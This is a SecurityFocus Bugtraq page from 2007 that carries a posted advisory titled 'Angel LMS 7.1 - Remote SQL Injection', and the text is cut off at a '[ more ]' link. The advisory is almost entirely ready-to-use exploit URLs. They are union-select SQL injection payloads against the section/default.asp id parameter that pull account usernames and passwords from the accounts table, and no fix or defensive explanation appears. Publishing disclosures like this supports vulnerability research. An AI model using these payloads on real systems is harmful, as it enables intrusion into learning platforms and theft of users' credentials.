Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs
Name:
Email:
*Note: Email address will appear as "user domain ext" to prevent harvesting.
Subject:
Message:
 
Angel LMS 7.1 - Remote SQL Injection Mar 01 2007 04:06PM
Guns inbox com
# Angel LMS 7.1 Remote SQL Injection
# by Guns

#All User Accounts#
http://[Angel Root Directory]/section/default.asp?id='%20union%20select%20top%201%20usernam
e%20from%20accounts--"

#Account Passwords#
http://[Angel Root Directory]/section/default.asp?id='%20union%20select%20top%201%20passwor
d%20fr...

[ more ]  




 

Privacy Statement
Copyright 2009, SecurityFocus